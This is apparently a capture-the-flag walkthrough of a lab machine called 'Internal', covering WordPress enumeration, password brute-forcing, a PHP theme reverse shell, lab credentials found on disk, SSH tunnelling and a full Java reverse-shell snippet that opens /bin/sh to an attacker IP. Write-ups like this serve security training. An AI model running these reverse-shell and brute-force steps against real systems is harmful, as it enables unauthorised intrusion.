HTB Internal

Penetration Test
,

Internal

Difficulty: High
Score: 8.5/10

Target

  1. 2 flags
  2. root privilege
  3. docker escalation

Process

Enumeration

Nmap Scan output

# Nmap 7.92 scan initiated Wed Jan 26 00:57:36 2022 as: nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.197.139 10.10.197.139
Nmap scan report for 10.10.197.139
Host is up (0.24s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 26 00:58:07 2022 -- 1 IP address (1 host up) scanned in 31.03 seconds

Replace the website-elements words

We check out the 80 port, it can’t load normally.

Inspect the elements, we found the interested things

All of things is loading to internal.thm, we can’t access internal.thm from local machine. We can use the brupsuite to match the key-word and replace them to IP address.

vim /etc/hosts
add the below information
10.10.19.247 internal.thm

ok it can load normally. Wordpress application, default login path /wp-login.php


We can login with bruteforce. I used the burpsuite intruder module→ the password is my2boys

Get shell

After we login, we can modify the theme code to add mailcious code (reverse_shell code) in it.


ok we connect it by the php-reverse-shell code

infomation collection

cat /opt/wp-save.txt
Bill,
Aubreanna needed these credentials for something later.  Let her know you have them and where they are.
aubreanna:bubb13guM!@#123

Login in as aubreanna via ssh

Pay more attention on IP address for docker0, we have to pen Intranet


We can make the tunnel by ssh, to connect the intranet.

ok we access http://localhost:8081

We use the burpsuite to crack the password, the password is spongebob

We can execute the script by the script console ( Java-Reverse-Shell )

String host="10.11.61.17";
int port=4446;
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Login in as root


Summary